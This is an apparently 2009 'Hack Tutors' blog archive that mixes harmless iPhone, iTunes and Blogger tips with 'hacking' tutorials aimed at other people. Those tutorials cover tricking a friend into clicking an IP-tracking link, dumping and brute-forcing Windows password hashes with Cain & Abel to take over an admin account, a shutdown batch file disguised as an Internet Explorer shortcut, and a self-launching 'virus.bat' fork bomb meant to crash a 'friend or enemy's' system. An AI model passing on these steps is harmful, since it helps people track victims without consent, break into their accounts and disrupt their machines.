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Tuesday, 29 September 2009

Get Location Of Anyone On Internet

Let’s say you want to hack your friend’s computer. Well the first and the essential thing to do (of course if you’re hacking over the Internet) is to find out his IP address. There are several methods of doing it but here’s an easy one. The only thing you have to do is to actually make your friend click a link you send him. When that person clicks the link, you will receive information like IP Address, Country, Host name, Operating System /Browser Details and region name . Just follow instructions below:

Go to this link , here you have to type in your email  address. Afterwards you’ll get a unique link that looks kinda like this one here When someones clicks that link you will receive tracing reports to your email .
It looks like this .

This method will not work if the person whose information you want to get is using a proxy server.
Then you will get false information.

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How To Hack Windows Password

There are many ways to break windows passwords, I will show you how do do it with Cain & Abel v2.0. It is powerful hacking tool which can break of various kind of passwords using Dictionary, Brute-Force, Cryptanalysis attacks … This tutorial tells you how to break administrator password and gain access to admin account with Brute-Force attack.
Just follow steps below.
1) Download Cain & Abel v2.0 from this link and install it.
2)Start Cain
3)Click on Cracker tab , on the left choose LM & NTLM Hashes and click on + sign icon on toolbar then Dump NT Hashes from Local machine.


5)After this will appear windows accounts , right click on account you want to break password and choose type of attack , in this example I chose brute force attack. Brute force actually means to start with a letter a and encrypting it. Then see if the encrypted strings match. If not then b, c, … until we’ve gotten to admin. Then the encrypted strings will match and we’ll know that is the right password. Brute force attack is the slowest method of cracking, but there is no risk that you’ll not find the password. The thing about brute force is that the time of cracking rises rapidly depending on how long the password is, how many characters are being used in it and so forth.




I hope this tutorial has helped, if something isn´t clear , don’t be afraid to ask questions to me!
If you want to learn hacking, But Don’t Know Where to Start? Check this out “Learn How To Hack With The Hacker’s Underground Handbook

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Cool Fake Facebook Virus

n this tutorial I will show you how to make a Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .

1) Open notepad

2) Type this in :

@echo off

shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

3)Save as Internet Explorer .bat

4)Right click on Internet Explorer .bat and click Create Shortcut

5)Right click on shorcut and click Properties.

6)Click Change Icon

7) Choose Internet Explorer icon or similar , click OK , then click Apply

8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:

After five minutes windows will restart , that is all. This is totally harmless and will give you a laugh. Enjoy !

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How to Enable MMS on iPhone OS 3.1 (AT&T)

When we reported that iPhone OS 3.1 breaks MMS and Tethering hack, we had many readers reporting that MMS and in some cases even tethering is working for them after upgrading to iPhone OS 3.1. It looks like it is working for users who had used the MMS hack.

Aaron Krill who had discovered the MMS hack for iPhone OS 3.0 is at it again. He has figured out a way to enable MMS on iPhone OS 3.1 without the need to jailbreak your iPhone.

Please proceed with caution and remember that you run the risk of voiding your iPhone's warranty.
Before you start, you need the following things:

  • Modified version of ATT_US.ipcc (carrier file), which can be downloaded from this link.

  • iPhone running iPhone OS 3.1

  • iTunes 8.2 or iTunes 9

Note: This will work only for AT&T customers.
You then need to enable IPCC updates for iTunes 8.2 (or iTunes 9) and copy the carrier (.ipcc) file to your iPhone. To achieve this, you need to follow these instructions:
Enabling IPCC Updates for iTunes:
iTunes 8.2 or iTunes 9 won’t allow you to apply the carrier file updates so you need to follow these steps:
1. Close iTunes.
2. Open Terminal (Applications > Utilities > Terminal).
3. Run the command: defaults write carrier-testing -bool TRUE
Windows 32 Bit:
1. Close iTunes.
2. Go to Start then Run and type CMD.
3. Run this command(If you right-click on the cmd window you can paste): “C:\Program Files\iTunes\iTunes.exe” /setPrefInt carrier-testing 1
Note: If the command in point 3 doesn't work then please double check the path of iTunes.exe on your computer and use that path instead of the one mentioned withing quotes above.
Windows 64 Bit:
1. Close iTunes.
2. Go to Start then Run and type CMD.
3. Run this command(If you right-click on the cmd window you can paste): “C:\Program Files (x86)\iTunes\iTunes.exe” /setPrefInt carrier-testing 1
Note: If the command in point 3 doesn't work then please double check the path of iTunes.exe on your computer and use that path instead of the one mentioned withing quotes above.
Updating your iPhone with the Carrier file:
To update your iPhone with the carrier file follow these instructions:

  1. Open iTunes & connect your iPhone.

  2. Click on your iPhone in iTunes(under devices listing).

  3. Windows Users: hold shift and click “Check for Update”.  MAC OS X: hold alt and click “Check for Update”.

  4. Select the .IPCC you downloaded earlier.

  5. Reboot your iPhone.

  6. MMS should be enabled on your iPhone.

Based on feedback from our readers and this HowardForums thread it looks like updating your iPhone with the carrier file is working for quite a few users. However, it doesn’t seem to work for everyone. Aaron thinks that this is because AT&T is in the process of removing the opt-out codes. I think AT&T is probably rolling out the MMS feature gradually for the official launch on September 25.

Update 1:
It looks like the tutorial doesn't work for iPhone 2G users and the earlier method to enable MMS on iPhone 2G also doen't work with iPhone OS 3.1.
Update 2:
If the above steps don't work then you can checkout the steps provided by YBT, it has worked for some users:

Make sure you have this typed in on settings/general/network/cellular data network and on the MMS section fill in the blanks :
APN: wap.cingular
MMS Proxy:
MMS Max Message Size: 614400
After i typed this stuff in mine and restarted my iphone it worked.

Thanks YBT!
Updated the post to add a note based on James's suggestion. Thanks James.

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How to create smart playlists in iphone

Believe it or not, not all users know how to create music playlists in iTunes. A playlist is, of course, a collection of tracks that you've grouped together for a particular reason. You can listen to playlists within iTunes or on your iPod, and you can use playlists to determine which songs are copied to your iPod or burned to CD.

To create a standard playlist, all you have to do is select File > New Playlist to create a new "untitled playlist" item in the Playlists section of the Source pane. Double-click this item and enter a title for the playlist; then select Music in the Library section of the Source pane. Select the songs you want to add to the playlist, and then drag them onto the name of the playlist in the Source pane. VoilĂ ! You now have a playlist of the songs you selected.

Even easier is a Smart Playlist, which automatically creates a playlist based on criteria you select. For example, you might want to create a playlist of your favorite soul singers, or music released in a given year, or even dance tracks at a specific tempo. All you have to do is define the rules, and iTunes will find the matching tracks and use them to create a new playlist.

To create a Smart Playlist, select File > New Smart Playlist. When the Smart Playlist dialog box appears, define a new rule that follows the form field > matches > keyword. Pull down the first list box to define the field (Album, Artist, Genre, and so on); pull down the second list box to define the match (contains, does not contain, starts with, ends with, and so forth); then enter one or more keywords into the final text box. For example, to include all songs by Frank Sinatra, select Artist > contains > Frank Sinatra.

To define another rule for this playlist, click the + button next to the first rule. This displays another set of selection controls. Repeat the steps just above to add the new rule, and then repeat the entire procedure to add even more rules for this playlist.

When you're done defining the criteria for your Smart Playlist, select whether you want songs to match Any or All of the rules you just created. To limit the size of the playlist, check the Limit To option and enter the number of items desired. And to keep this playlist updated when you add new items to your music library, check the Live Updating option. Click OK when done.

iTunes will now search your music library for items that match the rules you've defined and then create the new playlist. (The playlist is initially labeled "untitled playlist," so you'll need to select it in the Source pane and give it a proper name.)

Meanwhile You can check out the new PowWowNow Free Conference Calls iPhone application where you can save on the time, costs and carbon footprint associated with traveling to meetings, and you can connect with colleagues all over the world instantly, which also brings you free mobile conference calling at the touch of a button.

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How to increase the processor power of your computer

How to increase the processor power of your computer

How to increase the processor power of your computer
Today tip is very useful for those users who are still using computer with minimum processor speed. To increase the performance of slow computer, you can force your system to free up the idle tasks that are running in the background and sharing processor power. This end tasks method force the computer to devote its full processor resource to what you want it to do.
Follow the given steps to end the idle tasks:
To enable this feature, you will need to be logged into your computer with administrative rights.
Click Start button and click on Run option.
In the Run box, type the command Rundll32.exe advapi32.dll,ProcessIdleTasks command and press Ok button.
Here system will take some time to end the background idle tasks.

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Window Xp Hack Trick

Window Xp Hack Trick

1. If you want to increase the speed of your start menu than do the following thing: Go to start menu - run - and type regedit - registry editor will get displayed than - click on HKEY_CURRENT_USER - a large list will get displayed - go to control panel - again a large list will get displayed - click on desktop only once - other side of it will display u large number of list - than try to search file name MenuShowDelay - click on it -value data will be 400 make it 0 -close all the programmes and restart your comp.

2. If u want to create duplicate virus than do the following thing:
Go to desktop - right click anywhere - go to new - shortcut -u will get a small box - there type in the following thing where they tell you to specify location just write the following thing -shutdown -s -t 200 -c "this is a virus" - click next - it will make your computer shut down after every 3.20 minutes you can increase it by replacing 200 and write it in seconds - And if you want to disable this virus than do the following thing :
Go to run - and type -
-a this will make your computer normal

3. If you want to crash down the system of your friends or your enemy than do the following thing:
WARNING once saved dont open!!
type the following in notepad and save...
the main code is:
start virus.bat
save it as (any name u want).bat

4. You want to create an invisible folder than do the following:
Invisible folder...
right click on background - new folder - rename it to (hold alt 0160) - done
name is invisible but not folder, so to make the folder invisible right click and click properties -click on customize - click on change icon - u will get an invisible icon - click and done dnt try to loose it...

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Monday, 28 September 2009

Remove "Newer Posts" and "Older Posts" Links

Hey guys i have found a great tricks for blogger blog to hide or to make visible "Newer Posts" and "Older Posts" Links.

It is very easy to remove "Newer Posts" and "Older Posts" Link from the footer of your blog Post . You are actually hiding it which can be rolled back by reversing this hack. Now lets start removing this link from your blog.

Search for the following Code in your Template.

#blog-pager-newer-link {
float: left;

#blog-pager-older-link {
float: right;

#blog-pager {
text-align: center;

Now replace the above code with this code.

#blog-pager-newer-link {
float: left;
display: none;

#blog-pager-older-link {
float: right;
display: none;

#blog-pager {
text-align: center;
display: none;

If you like to rollback this and want to show "Newer Posts" and "Older posts" Link then reverse this Process.

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Find Out Who Has A Link To Your Home Page

ind Out Who Has A Link To Your Home Page

Internet Tips and Tricks
Find out who has a link to your home page:
Do you wonder who's got links that bring people to your web page? Well, here's an easy way to find out at least some of those referring pages:
Go to
Type link: for the search text and hit "ENTER"

For example, if your web page is at,


This method can only reveal referring pages that are registered in AltaVista Search or InfoSeek Search search engines.

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Thanks a lot for taking time and writing to me. I will respond to your email as soon as possible. Till then enjoy reading Hack Tutors :)

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Wednesday, 2 September 2009

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